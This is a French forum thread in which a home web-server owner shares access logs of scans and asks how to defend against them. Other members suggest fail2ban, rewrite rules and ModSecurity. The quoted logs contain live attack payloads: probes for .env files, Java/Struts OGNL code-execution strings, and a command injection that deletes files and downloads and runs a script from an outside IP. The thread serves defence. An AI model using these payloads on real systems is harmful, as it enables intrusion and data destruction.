Attaques d'un serveur web avec des ip proches

**nl.smart** · 24/12/2023, 00h43

Bonjour,

Comment se protéger d'attaques dont l'origine est une ip proche (45.131.193.???) ?

Les log ci-dessous font apparaître des erreurs 301 qui n'ont donc pas abouties contre mon serveur web sous linux.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
45.131.193.82 - - [23/Dec/2023:22:02:27 +0100] "GET /.env HTTP/1.1" 301 236
45.131.193.85 - - [23/Dec/2023:22:02:28 +0100] "GET /core/.env HTTP/1.1" 301 241
45.131.193.86 - - [23/Dec/2023:22:02:29 +0100] "GET /web/.env HTTP/1.1" 301 240
45.131.193.72 - - [23/Dec/2023:22:02:29 +0100] "GET /app/.env HTTP/1.1" 301 240
45.131.193.69 - - [23/Dec/2023:22:02:30 +0100] "GET /laravel/.env HTTP/1.1" 301 244
45.131.193.80 - - [23/Dec/2023:22:02:30 +0100] "GET /crm/.env HTTP/1.1" 301 240
45.131.193.83 - - [23/Dec/2023:22:02:30 +0100] "GET /backend/.env HTTP/1.1" 301 244
45.131.193.76 - - [23/Dec/2023:22:02:31 +0100] "GET /local/.env HTTP/1.1" 301 242
45.131.193.82 - - [23/Dec/2023:22:02:31 +0100] "GET /application/.env HTTP/1.1" 301 248
45.131.193.75 - - [23/Dec/2023:22:02:31 +0100] "GET /admin/.env HTTP/1.1" 301 242
45.131.193.81 - - [23/Dec/2023:22:02:32 +0100] "GET /prod/.env HTTP/1.1" 301 241
45.131.193.63 - - [23/Dec/2023:22:02:32 +0100] "GET /api/.env HTTP/1.1" 301 240
45.131.193.74 - - [23/Dec/2023:22:02:32 +0100] "GET /beta/.env HTTP/1.1" 301 241
45.131.193.73 - - [23/Dec/2023:22:02:33 +0100] "GET /env.js HTTP/1.1" 301 238
45.131.193.69 - - [23/Dec/2023:22:02:33 +0100] "GET /config.js HTTP/1.1" 301 241
45.131.193.78 - - [23/Dec/2023:22:02:35 +0100] "GET /.env.save HTTP/1.1" 301 241
45.131.193.81 - - [23/Dec/2023:22:02:35 +0100] "GET /_profiler/phpinfo HTTP/1.1" 301 249
45.131.193.69 - - [23/Dec/2023:22:02:35 +0100] "GET /phpinfo.php HTTP/1.1" 301 243
45.131.193.60 - - [23/Dec/2023:22:02:35 +0100] "GET /info.php HTTP/1.1" 301 240
45.131.193.65 - - [23/Dec/2023:22:02:36 +0100] "GET /config.php HTTP/1.1" 301 242
45.131.193.86 - - [23/Dec/2023:22:02:36 +0100] "GET /database.php HTTP/1.1" 301 244

Merci pour vos lumières.

**nl.smart** · 24/12/2023, 10h15

C'est Noël, il vient de remettre le couvert avec des attaques aboutissant à des erreurs 404

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
45.131.193.81 - - [24/Dec/2023:01:12:54 +0100] "GET /.env HTTP/1.1" 404 977
45.131.193.64 - - [24/Dec/2023:01:12:55 +0100] "GET /core/.env HTTP/1.1" 404 977
45.131.193.85 - - [24/Dec/2023:01:12:56 +0100] "GET /web/.env HTTP/1.1" 404 977
45.131.193.61 - - [24/Dec/2023:01:12:58 +0100] "GET /app/.env HTTP/1.1" 404 977
45.131.193.83 - - [24/Dec/2023:01:13:00 +0100] "GET /laravel/.env HTTP/1.1" 404 977
45.131.193.68 - - [24/Dec/2023:01:13:01 +0100] "GET /crm/.env HTTP/1.1" 404 977
45.131.193.68 - - [24/Dec/2023:01:13:03 +0100] "GET /backend/.env HTTP/1.1" 404 977
45.131.193.76 - - [24/Dec/2023:01:13:04 +0100] "GET /local/.env HTTP/1.1" 404 977
45.131.193.65 - - [24/Dec/2023:01:13:06 +0100] "GET /application/.env HTTP/1.1" 404 977
45.131.193.60 - - [24/Dec/2023:01:13:07 +0100] "GET /admin/.env HTTP/1.1" 404 977
45.131.193.60 - - [24/Dec/2023:01:13:09 +0100] "GET /prod/.env HTTP/1.1" 404 977
45.131.193.80 - - [24/Dec/2023:01:13:10 +0100] "GET /api/.env HTTP/1.1" 404 977
45.131.193.72 - - [24/Dec/2023:01:13:11 +0100] "GET /beta/.env HTTP/1.1" 404 977
45.131.193.65 - - [24/Dec/2023:01:13:12 +0100] "GET /env.js HTTP/1.1" 404 977
45.131.193.80 - - [24/Dec/2023:01:13:13 +0100] "GET /config.js HTTP/1.1" 404 977
45.131.193.64 - - [24/Dec/2023:01:13:15 +0100] "GET /.env.save HTTP/1.1" 404 977
45.131.193.83 - - [24/Dec/2023:01:13:16 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 977
45.131.193.66 - - [24/Dec/2023:01:13:17 +0100] "GET /phpinfo.php HTTP/1.1" 404 16
45.131.193.65 - - [24/Dec/2023:01:13:18 +0100] "GET /info.php HTTP/1.1" 404 16
45.131.193.75 - - [24/Dec/2023:01:13:20 +0100] "GET /config.php HTTP/1.1" 404 16
45.131.193.73 - - [24/Dec/2023:01:13:21 +0100] "GET /database.php HTTP/1.1" 404 16
45.131.193.72 - - [24/Dec/2023:01:13:22 +0100] "GET /.get/config HTTP/1.1" 404 977
45.131.193.70 - - [24/Dec/2023:01:13:23 +0100] "GET /system/.env HTTP/1.1" 404 977
45.131.193.75 - - [24/Dec/2023:01:13:24 +0100] "GET /protected/.env HTTP/1.1" 404 977
45.131.193.63 - - [24/Dec/2023:01:13:25 +0100] "GET /public/assets/.protected/.env HTTP/1.1" 404 977

La question est encore ouverte, comment se protéger de ce type d'attaques ?

J'ai trouvé peu de ressources à ce sujet https://webmasters.stackexchange.com...ange-66-249-72

**nl.smart** · 27/12/2023, 14h48

Il semblerait que crowdsec propose une solution quant aux attaques de type near range ip attacks.
Wait and see.

https://app.crowdsec.net/hub/author/...con-drop_range

Vos retours et points de vue sont les bienvenus.

**Ti-Slackeux** · 27/12/2023, 19h32

Bonsoir,

Avec iptables en premier lieu.
Sinon on peut mettre en place fail2ban qui fera la surveillance et les bans automatiquement.

hth,

**unanonyme** · 27/12/2023, 19h59

Bonjour,

pas utile, c'est un scan distribué, ou autre, pas un ddos.

Votre module bloquera la range si au moins 5 ip de la range sont bannies,
hors, de ce que vos logs affichent, vous n'obtiendrez jamais ces 5 ips.

Votre problème n'est pas de prévenir le scan, c'est d'y répondre correctement.
Ce genre de scan est un lot commun.

Dans votre premier extrait de log, je suppose que l'application fait des 301 vers l'accueil.
Pour 1 requête de scan vous dites au scanner d'en faire une seconde.
Pas utile.
Ce serait mieux de répondre une 404.

Dans votre second exemple de log vous avez deux types de réponse 404,
une courte de 16 octets, une longue de 977 octets.
Ce serait mieux de ne retourner que des réponses courte, voir vide.

Pour le reste, tant que l'attaquant aura du pognon à dépenser,
ce genre de scan continuera.

Maintenant, pour vraiment faire de la détection par range,
fail2ban doit pouvoir aider en utilisant un script de ce type
https://github.com/WKnak/fail2ban-block-ip-range/blob/main/fail2ban-block-ip-range.py

Vous pourriez aussi considérer votre problème par l'exclusion de d'url de requête.
Visiblement, le monsieur cherche des .env et autres,
une série de rewriterule fera le travail.

Autrement il existe ce bon vieux mod_security
https://github.com/SpiderLabs/ModSecurity

Tout cela existe aussi bien pour nginx, lighthttpd, iis etc

Mais bon pour 1QPS normalement vous ne devriez pas vous en préoccuper.

Bonne journée.

**nl.smart** · 27/12/2023, 21h41

Merci à vous 2 pour vos réponses et les lumières que vous apportez quant à la problématique rencontrée.

Des mesures de sécurité sont bien entendues déjà en place sur le home web server parmi celles que vous citez. Il s'agit de must have pour un minimum de sécurité pour un serveur web.

Je me pencherai sur vos liens (qui compléteront les ids && ips en place) dès que possible, espérant être en mesure de mettre en place certaines nouvelles mesures proposées. En tous cas il y a de la matière (c'est dense) pour le novice que je suis et ainsi parfaire les connaissances dans le domaine.

**nl.smart** · 08/02/2024, 09h21

Il y en a qui sont violents dès le matin !

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 977
145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 977
145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
145.239.11.122 - - [07/Feb/2024:07:46:12 +0100] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
145.239.11.122 - - [07/Feb/2024:07:46:12 +0100] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
145.239.11.122 - - [07/Feb/2024:07:46:12 +0100] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
145.239.11.122 - - [07/Feb/2024:07:46:12 +0100] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 977

**unanonyme** · 08/02/2024, 12h54

c'est intéressant, ça ressemble à un RCE sur du java.
Je ne savais pas qu'ils utilisaient ce genre de technique d'évaluation de code dans leurs frameworks.
https://www.google.com/search?q=opensymphony+java+rce

Mais 5QPS, en visitant n'importe quelle page web, un utilisateur en fait autant à causes des assets.
Il suffit d'avoir le HTML + 2 css + 2 scripts chargés depuis le même domaine, et il atteint 5qps.

Ces requêtes s'éliminent facilement en identifiant i/java.lang.[a-z]+/ dans l'url.
Pour un site PHP, c'est hautement douteux vu d'ici.

**nl.smart** · 11/02/2024, 19h02

Merci pour votre retour d'expériences, connaissances.

Encore un pour la route, ce code apparaît dans mes logs ces temps-ci

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
185.224.128.10 - - [11/Feb/2024:17:00:37 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 403 967
185.224.128.10 - - [11/Feb/2024:17:00:37 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 403 967

185.224.128.10 - - [11/Feb/2024:14:54:05 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 301 434
185.224.128.10 - - [11/Feb/2024:14:54:05 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 301 434
185.224.128.10 - - [11/Feb/2024:19:11:01 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 301 434
185.224.128.10 - - [11/Feb/2024:19:11:01 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 301 434

**unanonyme** · 11/02/2024, 22h49

celui là ne rigole pas =) rm%20-rf%20%2A%3B%20

**nl.smart** · 12/02/2024, 18h39

Merci pour votre expertise, je ne l'avais pas vu celui-là...

D'autres ont aussi signalé ces frasques...

https://www.abuseipdb.com/check/185.224.128.10

Vue son historique le nécessaire a été mis en place pour qu'il soit persona non grata sur mon réseau.

Attaques d'un serveur web avec des ip proches

Sécurité

Discussions similaires

Partager

Partager